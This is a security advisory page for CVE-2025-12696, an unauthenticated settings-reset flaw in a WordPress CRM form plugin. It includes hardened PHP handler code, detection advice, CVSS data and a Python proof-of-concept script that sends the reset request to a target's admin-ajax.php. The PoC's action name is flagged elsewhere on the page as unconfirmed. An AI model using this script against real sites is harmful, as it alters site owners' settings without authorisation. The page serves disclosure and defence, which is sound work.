Security Vulnerability Report
CVE-2025-12696 CVSS 5.3 MEDIUM

CVE-2025-12696

Published: 2025-12-14 06:15:37
Last Modified: 2026-04-15 00:35:42

Description

The HelloLeads CRM Form Shortcode WordPress plugin through 1.0 does not perform authorisation or CSRF checks when resetting its settings, allowing unauthenticated users to reset them.
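The weakness described above is the classic WordPress AJAX-handler mistake: a settings-reset action registered on a hook that anonymous visitors can reach, with neither a capability check nor a nonce check. The PHP below is an added illustration written for this report, not the plugin's own code; it shows the vulnerable shape next to the hardened one. The action name mirrors the PoC further down the page but is not confirmed to match the plugin's real hook, and the option key and function names are assumptions.

```php
<?php
// Added illustration, not the HelloLeads plugin's code. The action name
// 'helloleads_reset_settings' mirrors the PoC on this page (unconfirmed);
// the option key and function names below are assumptions.

// Vulnerable shape (only one of the two handlers would exist in a real plugin):
//  - registered on wp_ajax_nopriv_*, so logged-out visitors can invoke it
//  - no capability check, so any logged-in role could invoke it too
//  - no nonce check, so a cross-site POST from a victim's browser also works
add_action( 'wp_ajax_nopriv_helloleads_reset_settings', 'helloleads_reset_settings_vulnerable' );
add_action( 'wp_ajax_helloleads_reset_settings', 'helloleads_reset_settings_vulnerable' );
function helloleads_reset_settings_vulnerable() {
    delete_option( 'helloleads_form_settings' ); // assumed option key
    wp_send_json_success( 'reset' );
}

// Hardened shape: logged-in hook only, explicit capability check, nonce check.
add_action( 'wp_ajax_helloleads_reset_settings', 'helloleads_reset_settings_secure' );
function helloleads_reset_settings_secure() {
    // Authorisation: only users who may manage site options can reset settings.
    // wp_send_json_error() terminates the request, so no return is needed.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // CSRF: the request must carry a nonce minted for this exact action in the
    // 'nonce' POST field; check_ajax_referer() dies with a 403 ("-1") otherwise.
    check_ajax_referer( 'helloleads_reset_settings', 'nonce' );

    delete_option( 'helloleads_form_settings' ); // assumed option key
    wp_send_json_success( 'reset' );
}

// The admin page that issues the reset request must embed a matching nonce,
// for example wp_create_nonce( 'helloleads_reset_settings' ), and send it as
// the 'nonce' field of the POST body.
```

Both checks are needed: the capability check stops low-privileged or anonymous callers, and the nonce check stops a logged-in administrator's browser from being tricked into sending the request from another site. For detection, POST requests to `/wp-admin/admin-ajax.php` carrying this action from sessions without a WordPress login cookie are the signal to look for in web server or WAF logs.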

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

HelloLeads CRM Form Shortcode WordPress plugin <= 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-12696 PoC - HelloLeads CRM Form Shortcode Unauthenticated Settings Reset
# Target: WordPress site with HelloLeads CRM Form Shortcode plugin <= 1.0


def reset_settings(target_url):
    """
    Exploit for CVE-2025-12696
    Unauthenticated settings reset via admin-ajax.php
    """
    # Target the WordPress AJAX endpoint
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"

    # Plugin's reset action (identified from plugin code)
    data = {
        'action': 'helloleads_reset_settings',
        'nonce': ''  # No nonce required due to missing CSRF protection
    }

    try:
        print(f"[*] Sending reset request to {ajax_url}")
        response = requests.post(ajax_url, data=data, timeout=10)

        if response.status_code == 200:
            print("[+] Request successful - settings may have been reset")
            print(f"[*] Response: {response.text}")
        else:
            print(f"[-] Request failed with status: {response.status_code}")
    except requests.RequestException as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-12696.py <target_url>")
        print("Example: python cve-2025-12696.py http://example.com")
        sys.exit(1)
    reset_settings(sys.argv[1])

References

https://wpscan.com/vulnerability/e552dfc8-c6e1-4605-bc36-30dc4066eaea/

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12696", "sourceIdentifier": "[email protected]", "published": "2025-12-14T06:15:37.267", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The HelloLeads CRM Form Shortcode WordPress plugin through 1.0 does not have authorisation and CSRF check when resetting its settings, allowing unauthenticated users to reset them"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "references": [{"url": "https://wpscan.com/vulnerability/e552dfc8-c6e1-4605-bc36-30dc4066eaea/", "source": "[email protected]"}]}}